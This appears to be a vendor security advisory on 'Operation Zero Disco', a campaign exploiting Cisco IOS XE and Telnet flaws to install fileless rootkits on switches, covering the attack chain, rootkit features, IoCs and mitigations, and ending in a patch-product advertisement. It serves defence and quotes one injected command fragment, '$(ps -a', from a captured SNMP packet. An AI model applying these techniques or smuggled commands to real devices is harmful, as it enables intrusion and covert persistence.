Cybercriminals and advanced persistent threat (APT) actors continue to evolve toward persistence-driven, stealth-centric operations that exploit both zero-day and known vulnerabilities to compromise critical infrastructure. One of the most recent and concerning examples is Operation Zero Disco, a high-impact campaign that weaponizes CVE-2025-20352, a high Severity vulnerability in Cisco IOS XE, to deploy fileless Linux rootkits on core switches. The campaign has also been observed attempting to exploit a modified variant of CVE-2017-3881, a previously disclosed Telnet vulnerability, against legacy devices. Uncovered by Trend Micro, this campaign primarily affects older Cisco switch models like the 3750G series, which lack modern defense mechanisms. The attackers aim to establish long-term, low-noise access, enabling espionage, lateral movement, and traffic manipulation across segmented VLANs.

Background on Operation Zero Disco

Operation Zero Disco is a sophisticated cyberattack campaign targeting Cisco switches, primarily exploiting vulnerabilities in SNMP (Simple Network Management Protocol) and Telnet services. First uncovered by Trend Micro, the campaign is notable for:

• • Targeting both 32-bit and 64-bit Cisco platforms, including legacy models like the 3750G.

• • Installing fileless rootkits that provide persistent, stealthy access.

• • Bypassing authentication and logging mechanisms, making detection extremely difficult.

• • Using a UDP-based controller to manage infected devices covertly.

The attackers appear to be highly skilled, leveraging deep knowledge of Cisco internals and memory structures. The campaign is likely part of a broader criminal or state-sponsored espionage or disruption effort.

Vulnerability Details

CVE-2025-20352

• • CVSS Score: 7.7 (High)
  • EPSS: 0.57%
  • Vulnerability Type: Remote Code Execution
  • Affected Systems: Cisco IOS XE (32-bit & 64-bit), especially models: 9400, 9300, 3750G

CVE-2017-3881

• • CVSS Score: 10.0 (Critical)
  • EPSS: 94.02%
  • Vulnerability Type: Remote Code Execution
  • Affected Systems: Cisco IOS and IOS XE software

Impact

The impact of Operation Zero Disco is far-reaching, particularly in environments where legacy Cisco switches serve as core network infrastructure. Specific risks include:

• • Persistent Unauthorized Access: Attackers maintain long-term access through memory-resident rootkits.

• • Network Segmentation Bypass: VLAN manipulation allows threat actors to cross network boundaries.

• • Stealth Reconnaissance and Espionage: Log manipulation and in-memory execution provide near-invisible operational cover.

• • Traffic Hijacking and ARP Spoofing: Enables data interception and redirection within internal networks.

• • Security Tool Evasion: Fileless execution bypasses most signature-based AV/EDR tools.

Infection Method

1. Initial Access via SNMP Exploit

• • Attackers exploited the SNMP service using CVE-2025-20352.

• • The SNMP service was often left exposed with default “public” community strings, making it an easy entry point.

• • Malicious SNMP packets were sent to the device, each carrying a fragment of a shell command due to SNMP payload size limits.
    • • Example: A captured packet contained the command $(ps -a.
    • • Full commands were reconstructed from multiple packets.

2. Rootkit Deployment

• • On 32-bit devices (e.g., 3750G):
    • • The SNMP exploit allowed remote code execution (RCE).
    • • A Linux rootkit was installed to maintain persistence and evade detection.

• • On 64-bit devices (e.g., 9300/9400):
    • • Required level 15 privilege to access the guest shell.
    • • Once inside, attackers used a universal password (containing “disco”) to gain access.
    • • A fileless rootkit was deployed via the guest shell.

3. Advanced Exploits

• • Logging Bypass:
    • • A variant of the SNMP exploit could disable trace logging without using mmap.
    • • Only a few memory addresses were needed to achieve RCE.

• • Telnet Exploit:
    • • A modified version of CVE-2017-3881 was used to allow arbitrary memory read/write.
    • • Full capabilities are still under investigation.

4. Post-Exploitation Control

• • A UDP-based controller was deployed to manage the rootkit.

• • The controller could:
    • • Toggle or delete logs.
    • • Bypass AAA authentication and VTY ACLs.
    • • Enable/disable the universal password.
    • • Hide configuration changes (e.g., accounts, ACLs, EEM scripts).
    • • Reset configuration timestamps to hide modifications.

5. Lateral Movement

• • Attackers used ARP spoofing to impersonate trusted devices (e.g., waystations).

• • This allowed them to bypass internal firewalls and move laterally across VLANs.

• • The ARP spoofing tool was a Linux ELF binary executed via the guest shell.

Malware Capabilities

• • Universal Password Injection: Hooks low-level auth to allow access across all login methods.

• • Log Manipulation: Can disable or delete logs, making detection difficult.

• • Configuration Cloaking: Hides specific ACLs, accounts, and scripts from running-config.

• • VTY ACL Bypass: Ignores access control lists on virtual terminal lines.

• • UDP Controller: Used to manage the rootkit remotely, even without open ports.

Tactics, Techniques & Procedures (TTPs)

Operation Zero Disco maps closely to the MITRE ATT&CK framework, exhibiting a full chain of compromise from initial access to stealthy command and control.

• • TA0001 – Initial Access: Exploitation of SNMP vulnerability for RCE.

• • TA0002 – Execution: Arbitrary code execution via buffer overflow in SNMP daemon.

• • TA0003 – Persistence: Fileless rootkit modifies IOSd memory; sets a universal password containing the word “disco”.

• • TA0005 – Defense Evasion: Attackers disable logging, hide configuration changes, and bypass AAA and VTY ACLs.

• • TA0008 – Lateral Movement: VLAN routing manipulation and ARP spoofing to move laterally across networks.

• • TA0011 – Command & Control: Use of a UDP-based controller that operates without explicit open ports.

Indicators of Compromise (IoCs)

• • Hidden Accounts: e.g., dg3y8dpk, dg4y8epk, etc.

• • Hidden ACLs: e.g., EnaQWklg0, EnaQWklg1

• • EEM Scripts: CiscoEMX-1 to CiscoEMX-5

• • Suspicious UDP Payloads: Used for rootkit control.

• • ARP Spoofing Tools: ELF binaries running in guest shell.

Mitigation Steps

To defend against Operation Zero Disco, security teams should take immediate action:

1. 1. Patch All Affected Devices Apply Cisco’s patch for CVE-2025-20352 without delay. Check PSIRT advisory for firmware updates.

1. 1. Restrict SNMP Access Limit SNMP to secure, authenticated community strings and only allow from trusted management subnets.

1. 1. Segment Legacy Devices Isolate legacy switches that can’t be patched immediately and monitor them closely for anomalies.

1. 1. Audit Network Configuration Look for unexpected routing rules, ACL changes, or hidden configuration segments on core switches.

1. 1. Engage Cisco TAC for Firmware Integrity Checks Cisco TAC can assist with forensic inspection of switch memory and persistent changes.

1. 1. Deploy Threat Detection & Virtual Patching Use Trend Micro Cloud One Network Security and Deep Discovery Inspector to detect SNMP anomalies and apply virtual patches.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications. It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction. Experience the fastest and most accurate patching software here.